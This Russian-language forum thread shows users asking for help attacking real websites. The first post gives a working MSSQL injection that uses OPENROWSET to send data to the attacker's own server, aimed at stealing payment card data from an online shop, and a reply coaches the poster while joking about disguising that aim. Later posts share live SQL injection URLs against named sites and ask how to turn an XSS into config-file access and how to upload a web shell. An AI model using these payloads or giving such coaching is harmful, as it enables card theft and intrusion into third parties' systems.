Здравствуйте!

Нашёл mssql-иньекцию в одном интернет-магазинчике.
Выборку данных оттуда произвожу добавлением в строку запроса подобной штуки:

;insert+into+openrowset('sqloledb','uid=user3000;p wd=pass3000;network=DBMSSOCN;Address=777.777.103.4 ','select+line+from+base3000..tbltest')+select+tab le_name+from+information_schema.tables;--

Таким образом получаю данные на свой сервак. Страница просто перезагружается, данные заливаются ко мне, ошибки не происходит. Все довольны.

В текущей базе есть таблица Orders. В не хранится картон, но есть колонка CCOrderID. Я предполагаю, что картон хранится в другой таблице.

При заказе и оплате картон поля с реквизитами карты передаются в ccorder.asp.

Есть базы данных с именем cybersales. Думаю карты там.

Запрос select+table_name+from+cybersales.information_sche ma.tables не выполняется. Не просто не выдаёт результат на мой сервер, а именно не выполняется. Об этом я сужу по тому, что мне выдаётся HTTP 500 - Internal server error:The page cannot be displayed. А когда запрос корректно выполняется, то просто происходит перезагрузка страницы.

Видимо у текущего пользователя нет прав на просморт бд cybersales.

Делаю запрос select+name+from+master..syslogins. Получаю все логины. Есть cybersalesuser.

Запрос select+password+from+master..sysxlogins выполняется но ничего не выдаёт на мой сервер.

Каковы мой дальнейшие действия? Хочется добраться до картона. Спасибо!

Давай так: ни о каком картоне мы не говорим,говорим о скуле(как вам конспирация? )
Вот так не бывает:
"cybersales.information_schema.tables"

information_schema.tables содержит все таблицы всех баз эта запись означает БАЗА-information_schema,ТАБЛИЦА-tables
Если есть база с именем cybersales то её таблицы тоже будут в information_schema.tables, а доступ к ней через точку т.е. cybersales.ТАБЛИЦА
Если ты можешь выполнить master.. то прав на просмотр скорее всего хватит хотя не 100% конечно

Кажется понял. Ты хочешь сказать, что по запросу select+table_name+from+information_schema.tables выводятся ВСЕ таблицы ВСЕХ баз данных? Не думаю я. Таблиц по этому запросу выводится штук 20. А баз дынных есть штук 45.

Помогите, пжста! )) на сайте была найдена уязвимость XSS типа если в адресную строку вбить http://site.ru/pages/index.php?=2//какой_то_текст , то все, что стоит после цифры 2 выводится как текст на странице! Вопрос: как это можно использовать? пробовал вставлять <? system($cmd); ?> - не работает.. Вообще конечно хотелось бы просмотреть конфигурационный файл в корне сайта что бы получить доступ к БД. Извините, возможно и глупый вопрос, я просто в этом новичек.. ))

Если вставить после 2 вот это <script>alert()</script> то алерт конечно срабатывает..

почитай вот эти статьи, найдешь много полезно про XSS:
https://forum.antichat.ru/showthread.php?t=11807
https://forum.antichat.ru/showthread.php?t=44125
https://forum.antichat.ru/showthread.php?t=42951

http://lasgy.tln.edu.ee/?smg=news&ca=2989+or+1%3D1+--+

Сканер показал слепую инъекцию,но у мя ничё не вышло тут. Наяба ? о_О

P.S. : Есть также дыра,позволяющая выполнить произвольный код в OpenSSH.тоже от сканера

Уязвимость существует из-за ошибки в процедуре обработки служебных сигналов. Уязвимость позволяет злоумышленнику аварийно завершить работу сервиса OpenSSH или выполнить произвольный код в системе. Для эксплуатации уязвимости необходимо чтобы сервис использовал GSSAPI аутентификацию (параметр GSSAPIAuthentication в файле конфигурации).

Прошу не бить за лог:Р,прост сплойта в нете не нашёл,а сам написать имхо не могу =_=(Знал бы не спрашивал =)).Есть у кого какие идеи ?)

привет всем!
что делать если при таком запросе -9999+UNION+SELECT+1,2,user(),4/*
ну или место юзер датабэйс и.т.д. просто появляется чистый экран.

ссылку

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

www.railway.dn.ua/ru/index.php?index=4&number=1'+union+select+1,2,3,4/* как найти полную директорию для записи файла и заливки шелла????